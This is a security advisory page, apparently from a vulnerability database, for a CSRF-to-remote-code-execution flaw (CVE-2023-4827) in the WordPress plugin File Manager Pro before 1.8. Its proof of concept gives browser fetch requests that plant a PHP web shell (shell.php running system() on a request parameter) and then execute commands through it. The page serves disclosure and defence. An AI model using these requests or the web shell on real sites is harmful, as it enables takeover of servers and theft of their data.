Lucene search
Dmitrii IgnatyevWPEX-ID:D4DAF0E1-8018-448A-964C-427A355E005FHistorySep 11, 2023 - 12:00 a.m.
File Manager Pro < 1.8 - Remote Code Execution via CSRF
2023-09-1100:00:00
Dmitrii Ignatyev
48
super admin
remote code execution
cross-site request forgery
shell.php
logged-out attacker
browser console
nonces
Description The plugin does not properly check the CSRF nonce in the fs_connector AJAX action. This allows attackers to make highly privileged users perform unwanted file system actions via CSRF attacks by using GET requests, such as uploading a web shell.
As a Super Admin, run the following code in the browser console (note that the requests do not require nonces):
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=mkfile&name=shell.php&target=l1_Lw" );
await fetch( "/wp-admin/admin-ajax.php?action=fs_connector&cmd=put&target=l1_c2hlbGwucGhw&content=%3C?php%20echo%20system($_REQUEST%5B'cmd'%5D);" );
Now a logged-out attacker may access `shell.php` as follows:
await (await fetch( "/shell.php?cmd=id" ) ).text()Related
prion
prion
Cross site request forgery (csrf)
2023-10-16 09:15:00
nvd
nvd
CVE-2023-4827
2023-10-16 09:15:11
cve
cve
CVE-2023-4827
2023-10-16 09:15:11
wpvulndb
wpvulndb
File Manager Pro < 1.8 - Remote Code Execution via CSRF
2023-09-11 00:00:00
cvelist
cvelist
CVE-2023-4827 File Manager Pro < 1.8 - Remote Code Execution via CSRF
2023-10-16 08:32:43
wordfence
wordfence
8.6 High
AI Score
Confidence
High
0.001 Low
EPSS
Percentile
37.6%
Related for WPEX-ID:D4DAF0E1-8018-448A-964C-427A355E005F